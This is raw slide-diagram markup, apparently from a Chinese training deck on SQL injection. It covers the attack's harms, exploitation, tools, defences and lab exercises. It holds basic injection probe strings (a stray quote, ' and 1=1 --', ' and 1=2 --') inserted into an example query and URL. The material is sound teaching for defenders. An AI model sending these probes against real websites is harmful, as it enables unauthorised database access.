        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3262804" y="3372390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课程大纲</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3262804" y="3372390"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3AB70322-485B-4202-8324-DCB2B0E5464B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4631663" y="1839554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上午</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4631663" y="1839554"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0EDB8BBC-2CE3-4D5A-A917-53E4BD1717DC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6000521" y="245404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初步认识</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6000521" y="245404"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{83B25443-3E77-4D6C-B375-FED79E0E1704}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="150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什么是</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" kern="1200" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" kern="1200" dirty="0"/>
            <a:t>注入</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="150"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{354C4E06-3411-49D1-938C-70B86405FFF4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="490658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SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" kern="1200" dirty="0"/>
            <a:t>注入危害</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="490658"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{53D1C6C9-0653-495E-A16C-8B8B48E2A752}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6000521" y="1226419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利用方式</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6000521" y="1226419"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{74B79C58-E215-45CD-B6EE-88FEF3835331}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="981165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SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" kern="1200" dirty="0"/>
            <a:t>注入攻击基础</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="981165"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{871C0AF4-C046-499A-8245-03B34C126D65}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="1471673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进阶利用</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="1471673"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E6E28F3E-FDD0-489C-8346-0E362F86AD27}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6000521" y="2207434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工具使用</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6000521" y="2207434"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5022B2A3-F3C6-41E2-9D93-43018849BE82}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="1962181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手动渗透工具</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="1962181"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E35CD46C-FBFA-4B62-AD69-2B2333EBC3B7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="2452688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自动渗透工具</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="2452688"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7692EF1C-AB9E-4836-B5B7-7FAABC9FF3D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6000521" y="3433703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防护方法</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6000521" y="3433703"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F2ADCC5A-03D4-437B-BEF0-9385621BF606}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="2943196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设备防护</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="2943196"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F3D3141B-E021-4820-8597-5854F710D1CF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="3433703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编码规范</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="3433703"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{013821B9-E074-4F1F-91E1-5E8929AE29A7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="3924211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配置加固</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="3924211"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6DEBAC0C-3221-4515-8FD2-7B623AC82616}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4631663" y="4905226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下午</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4631663" y="4905226"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A83D34C8-180C-47B3-BD17-5CE6F872550F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6000521" y="4905226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实操演练</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6000521" y="4905226"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3C98E654-4F9B-4BA4-973A-0B7861FB9056}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="4414718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手动</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" kern="1200" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" kern="1200" dirty="0"/>
            <a:t>注入练习</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="4414718"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4DD97DA6-5D8C-4D3E-8416-4783DA8609F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="4905226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工具</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100" kern="1200" dirty="0"/>
            <a:t>SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" kern="1200" dirty="0"/>
            <a:t>注入练习</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="4905226"/>
        <a:ext cx="1140715" cy="347918"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2DE82A59-8D26-495B-A66F-0961B6E6109E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7369379" y="5395734"/>
          <a:ext cx="1140715" cy="347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SQL</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100" kern="1200" dirty="0"/>
            <a:t>加固练习</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7369379" y="5395734"/>
        <a:ext cx="1140715" cy="347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7C0F-16AB-4B9C-88D2-EF03126FDE4F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="2430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C923F-AFD1-45DC-9DED-96127DED69DF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="2430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数据库信息泄漏（拖库）</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="2430"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{97D90C10-B72B-465C-A840-9720E5568AD5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="837968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FD1B01-F7C4-46E4-81A0-8CA0673B8863}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="837968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数据库恶意操作（修改金额）</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="837968"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4F27C2BB-3790-43A6-B3FC-42170389D648}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="1673505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DECCE9-3F47-4DD2-BFA6-E970E2AB1644}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="1673505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网站挂马（植入网页木马）</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="1673505"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{23C658F0-65FC-4131-A97D-246EAA5ECAD3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="2509043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D5D8B-9F66-4838-94DA-76FA5D4CCB13}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="2509043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网页篡改（挂标语）</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="2509043"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2278B80B-133A-45A7-AC6E-38851CED986C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="3344580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8168FD-4B68-4DD6-82B5-0F37B3C2E0C2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="3344580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安装后门</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="3344580"/>
        <a:ext cx="4457897" cy="835537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{30A5B66D-80B2-49F9-90B4-359B4D9DBA78}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2697728" y="4180117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567578-90E9-4C1F-AA15-627382938DDE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3115497" y="4180117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获取系统权限</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3115497" y="4180117"/>
        <a:ext cx="4457897" cy="835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D936D-FB79-4CF2-8173-3835989193E6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1095" y="848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单引号</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24374" y="872127"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6173BA66-ACBB-45FF-9F58-E4F9FDB1BDAF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1521179" y="1713209"/>
          <a:ext cx="139092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0D37F-E97E-465A-88FE-4F69714316BD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1095" y="1921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http://abc.com/?id='</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24374" y="1945127"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1552FF9C-879A-4EF6-8F21-C3EA90CA04D5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1521179" y="2786209"/>
          <a:ext cx="139092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9335B-393C-4877-B529-79367D51A1EE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1095" y="2994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select </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>* </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0"/>
            <a:t>from tables</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0"/>
            <a:t>where id= </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0"/>
            <a:t>;</a:t>
          </a:r>
          <a:endParaRPr sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24374" y="3018127"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9A5A7F41-1ED1-5548-A436-59721DF09EA7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="1521179" y="3859209"/>
          <a:ext cx="139092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D441-6FCD-704B-9281-D4576CE3B5D8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1095" y="4067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sql</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>解析引擎报错</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24374" y="4091127"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{535FB04B-59D7-4758-B949-33370926E967}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3625451" y="848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条件</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3648730" y="872127"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1D2705B9-1F03-4086-9FF8-1311E873F6E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5449077">
          <a:off x="5129759" y="1728975"/>
          <a:ext cx="154874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D87A1-CD1E-40B3-BE74-2D3837AF0BA9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3609682" y="1953380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 and 1=1 (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>数字型</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0"/>
            <a:t>)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" alt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en-US" altLang="zh-CN" sz="2000" kern="12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kern="1200" dirty="0"/>
            <a:t> and 1=1 --(</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>字符型）</a:t>
          </a:r>
          <a:endParaRPr sz="2100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3632961" y="1976659"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6C6CDCDA-9191-4CCC-BD60-1A487D5768AA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5248531">
          <a:off x="5153286" y="2817740"/>
          <a:ext cx="139360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BB5E-BE17-F741-AF6D-7DBE4FC74D97}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3656989" y="302637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select </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>* </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0"/>
            <a:t>from tables</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0"/>
            <a:t>where id= </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="12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b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>1</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>and 1=1 --</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3680268" y="3049657"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{442A2723-CCC4-8A4F-A5F7-123936076C6B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5504072">
          <a:off x="5177012" y="3874974"/>
          <a:ext cx="107676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A805F-9C20-4444-B427-D6D304B9C7B7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="3625451" y="4067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访问正常</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3648730" y="4091127"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A89538F6-290A-CA43-AFBE-4A025999F71E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="7249807" y="848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条件</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7273086" y="872127"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9253B889-B0DE-434F-8443-E4FEE56D3906}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5396437">
          <a:off x="8774380" y="1705327"/>
          <a:ext cx="131210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B3218-B3E6-1546-86C5-C9B32E05B4A2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="7250903" y="1906083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 and 1=2(</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>数字型</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="1200" dirty="0"/>
            <a:t>)</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" alt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en-US" altLang="zh-CN" sz="2000" kern="12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000" kern="1200" dirty="0"/>
            <a:t> and 1=2 --(</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>字符型）</a:t>
          </a:r>
          <a:endParaRPr sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7274182" y="1929362"/>
        <a:ext cx="3132701" cy="748256"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4BB9A3C1-DDFE-DB4E-8D16-5331CF699EEB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5403460">
          <a:off x="8762556" y="2778327"/>
          <a:ext cx="154857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ADA1-61A7-AA4E-B780-BB319EFDE73C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="7249807" y="2994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select </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2200" kern="1200" dirty="0"/>
            <a:t>* </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2200" kern="1200" dirty="0"/>
            <a:t>from tables</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2200" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2200" kern="1200" dirty="0"/>
            <a:t>where id= </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:rPr>
            <a:t>'</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="2200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
